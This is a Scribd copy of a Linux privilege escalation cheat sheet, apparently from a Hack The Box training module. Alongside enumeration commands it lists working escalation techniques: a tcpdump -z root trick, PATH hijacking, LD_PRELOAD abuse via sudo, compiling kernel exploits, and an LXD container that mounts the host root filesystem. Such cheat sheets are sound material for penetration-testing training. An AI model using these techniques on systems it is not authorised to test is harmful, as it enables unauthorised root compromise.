Scribd
Upload
179 views3 pages

Linux Privilege Escalation Module Cheat Sheet

Linux privilege escalation

Uploaded by

vuduchieu1611
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
179 views3 pages

Linux Privilege Escalation Module Cheat Sheet

Linux privilege escalation

Uploaded by

vuduchieu1611
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

LINUX PRIVILEGE ESCALATION

CHEAT SHEET
Command Description

ssh htb-student@<target IP> SSH to lab target

ps aux | grep root See processes running as


root

ps au See logged in users

ls /home View user home directories

ls -l ~/.ssh Check for SSH keys for


current user

history Check the current user's Bash


history

sudo -l Can the user run anything as


another user?

ls -la /etc/cron.daily Check for daily Cron jobs

lsblk Check for unmounted file


systems/drives

find / -path /proc -prune -o -type d -perm -o+w Find world-writeable


2>/dev/null directories

find / -path /proc -prune -o -type f -perm -o+w Find world-writeable files
2>/dev/null

uname -a Check the Kernel versiion


Command Description

cat /etc/lsb-release Check the OS version

gcc kernel_expoit.c -o kernel_expoit Compile an exploit written in


C

screen -v Check the installed version of


Screen

./pspy64 -pf -i 1000 View running processes with


pspy

find / -user root -perm -4000 -exec ls -ldb {} Find binaries with the SUID
\; 2>/dev/null bit set

find / -user root -perm -6000 -exec ls -ldb {} Find binaries with the
\; 2>/dev/null SETGID bit set

sudo /usr/sbin/tcpdump -ln -i ens192 -w Priv esc with tcpdump


/dev/null -W 1 -G 1 -z /tmp/.test -Z root

echo $PATH Check the current user's


PATH variable contents

PATH=.:${PATH} Add a . to the beginning of


the current user's PATH

find / ! -path "*/proc/*" -iname "*config*" - Search for config files


type f 2>/dev/null

ldd /bin/ls View the shared objects


required by a binary

sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 Escalate privileges using


restart LD_PRELOAD

readelf -d payroll | grep PATH Check the RUNPATH of a


binary

gcc src.c -fPIC -shared -o Compiled a shared libary


/development/libshared.so

lxd init Start the LXD initialization


process
Command Description

lxc image import alpine.tar.gz Import a local image


alpine.tar.gz.root --alias alpine

lxc init alpine r00t -c security.privileged=true Start a privileged LXD


container

lxc config device add r00t mydev disk source=/ Mount the host file system in
path=/mnt/root recursive=true a container

lxc start r00t Start the container

showmount -e 10.129.2.12 Show the NFS export list

sudo mount -t nfs 10.129.2.12:/tmp /mnt Mount an NFS share locally

tmux -S /shareds new -s debugsess Created a shared tmux


session socket

./lynis audit system Perform a system audit with


Lynis

You might also like